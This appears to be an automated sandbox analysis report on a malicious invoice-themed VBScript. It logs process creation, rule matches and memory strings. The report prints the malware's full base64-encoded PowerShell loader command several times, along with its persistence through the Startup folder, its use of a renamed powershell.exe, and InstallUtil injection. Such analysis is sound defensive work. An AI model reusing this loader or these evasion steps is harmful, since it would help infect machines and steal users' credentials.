                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_05602B4817_2_05602B48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_0565D76817_2_0565D768
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_0565098D17_2_0565098D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_0565901017_2_05659010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_0565CF6017_2_0565CF60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_0565900017_2_05659000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_056A5D5817_2_056A5D58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_056AB82017_2_056AB820
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_056AA7BF17_2_056AA7BF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_056AB80F17_2_056AB80F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_056AD8C117_2_056AD8C1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_056AD8D017_2_056AD8D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_057CB10817_2_057CB108
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_057C7C7017_2_057C7C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_057C8D0817_2_057C8D08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_057C7F9717_2_057C7F97
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_05AB74E017_2_05AB74E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_05ABE1F217_2_05ABE1F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_05AB9D2817_2_05AB9D28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_05ABA94017_2_05ABA940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_05ABD88017_2_05ABD880
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_05ABFA0017_2_05ABFA00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_05AB75F717_2_05AB75F7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_05AB755417_2_05AB7554
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_05AB74D017_2_05AB74D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_05AB778F17_2_05AB778F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_05AB666817_2_05AB6668
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_05AB665817_2_05AB6658
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_05ABA07017_2_05ABA070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_05ABF9F117_2_05ABF9F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_05AB783317_2_05AB7833
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_05ABD87F17_2_05ABD87F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_060BC0C817_2_060BC0C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_0622136717_2_06221367
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_0622137817_2_06221378
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_06227DE817_2_06227DE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 17_2_06227DD717_2_06227DD7
                Source: Fattura-24SC-99245969925904728562.vbsInitial sample: Strings found which are bigger than 50
                Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000000.1312120527.0000000000434000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs Fattura-24SC-99245969925904728562.vbs
                Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1357497221.0000000002C09000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Fattura-24SC-99245969925904728562.vbs
                Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1423198807.000000000A040000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Fattura-24SC-99245969925904728562.vbs
                Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000004DC6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs Fattura-24SC-99245969925904728562.vbs
                Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000005206000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOwvaenanf.exe" vs Fattura-24SC-99245969925904728562.vbs
                Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Fattura-24SC-99245969925904728562.vbs
                Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000005437000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Fattura-24SC-99245969925904728562.vbs
                Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000004D71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Fattura-24SC-99245969925904728562.vbs
                Source: Fattura-24SC-99245969925904728562.vbs.exe.4.drBinary or memory string: OriginalFilenamePowerShell.EXEj% vs Fattura-24SC-99245969925904728562.vbs
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2244
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2232
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2244Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2232Jump to behavior
                Source: Process Memory Space: Fattura-24SC-99245969925904728562.vbs.exe PID: 7764, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: OSDescription.vbs.exe PID: 6024, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                Source: 7.2.Fattura-24SC-99245969925904728562.vbs.exe.a040000.6.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                Source: classification engineClassification label: mal100.bank.troj.spyw.expl.evad.winVBS@18/10@2/1
                Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: \Sessions\1\BaseNamedObjects\c9d5959dd5627383
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_03
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05eouqb0.jr2.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs"
                Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: InstallUtil.exe, 00000009.00000002.1452882158.0000000002A7C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1452882158.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.00000000033F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Fattura-24SC-99245969925904728562.vbsReversingLabs: Detection: 26%
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeFile read: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbsJump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs"
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" /Y
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OSDescription.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" /Y
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAJump to behavior
                Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs" Jump to behavior
